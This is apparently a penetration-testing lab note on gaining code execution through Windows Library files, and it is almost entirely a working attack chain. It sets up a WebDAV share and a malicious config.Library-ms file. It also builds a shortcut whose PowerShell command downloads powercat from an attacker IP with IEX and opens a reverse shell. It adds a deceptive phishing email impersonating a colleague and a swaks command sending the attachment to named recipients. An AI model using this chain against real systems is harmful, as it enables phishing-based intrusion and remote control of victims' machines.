code execution via Windows Library Files

Enable webdav share
- mkdir /home/kali/webdav
- cd ~/webdav
- python -m venv .venv
- source .venv/bin/activate
  - python -m pip install -U pip
  - python -m pip install wsgidav cheroot lxml
  - wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/

Create 2 file on Windows
- open window machine
- Open vscode
  - create new file name config.Library-ms
    - <?xml version="1.0" encoding="UTF-8"?>
      <libraryDescription xmlns="
      http://schemas.microsoft.com/windows/2009/library">
      <name>@windows.storage.dll,-34582</name>
      <version>6</version>
      <isLibraryPinned>true</isLibraryPinned>
      <iconReference>imageres.dll,-1003</iconReference>
      <templateInfo>
      <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
      </templateInfo>
      <searchConnectorDescriptionList>
      <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
      <url>
      http://192.168.119.2</url>
      </simpleLocation>
      </searchConnectorDescription>
      </searchConnectorDescriptionList>
      </libraryDescription>
    - save on desktop
  - create a shortcut file name install
    - Right click on desktop New>shortcut
    - enter command in item’s location
      powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"
- Transfer both file on webdav dir

On Webdav dir
- nano body.txt
  - Hey!
    I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.
    On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!
    John
- cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
- and 2 file from windows
- python3 -m http.server 8000
- nc -nvlp 444

Now send email
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap